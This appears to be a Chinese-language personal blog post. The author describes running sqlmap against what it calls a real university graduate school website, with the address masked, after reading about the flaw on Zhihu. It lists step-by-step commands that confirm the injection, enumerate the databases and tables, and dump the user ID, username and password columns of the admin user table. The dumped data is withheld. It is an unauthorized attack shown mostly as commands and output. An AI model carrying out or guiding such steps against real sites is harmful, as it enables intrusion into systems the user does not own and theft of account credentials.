<Excerpt in index | 首页摘要>
利用sqlmap注入
暴库
<The rest of contents | 余下全文>
今天在知乎上,意外发现某个说发现某个学校研究生学院官网存在注入漏洞。
正巧前段时间服务器上装了sqlmap,就想要简单测试一下。结果就中奖了.
首先检测下是否存在注入漏洞
1 | ./sqlmap.py -u "http://xxx.xxx.xxx.xx/enrollment_employment_news.php?id=1159" --batch |
返回信息如下:
1 | Parameter: id (GET) |
windows的操作系统Apache的服务器mysql的数据库php5.x
基本可以确定这个连接确实存在注入点了.
尝试枚举一下数据库
1 | ./sqlmap.py -u "http://xxx.xxx.xxx.xx/enrollment_employment_news.php?id=1159" --dbs |
爆出的数据库如下
1 | available databases [10]: |
查询下当前的数据库
1 | ./sqlmap.py -u "http://xxx.xxx.xxx.xx/enrollment_employment_news.php?id=1159" --current-db |
1 | current database: 'ecms' |
枚举以下当前数据库里面的tables
1 | ./sqlmap.py -u "http://xxx.xxx.xxx.xx/enrollment_employment_news.php?id=1159" -D ecms --tables |
1 | +-------------------------------+ |
唔,phome_enewsuser比较 像是.
枚举下字段
1 | ./sqlmap.py -u "http://xxx.xxx.xxx.xx/enrollment_employment_news.php?id=1159" -D ecms -T phome_enewsuser --columns |
1 | [8 columns] |
最后就是枚举具体值了
1 | ./sqlmap.py -u "http://xxx.xxx.xxx.xx/enrollment_employment_news.php?id=1159" -D ecms -T phome_enewsuser -C "userid,username,password" --dump |
数据就不贴了。乌云也没了。也没地方提交漏洞。就自己简单记一下吧。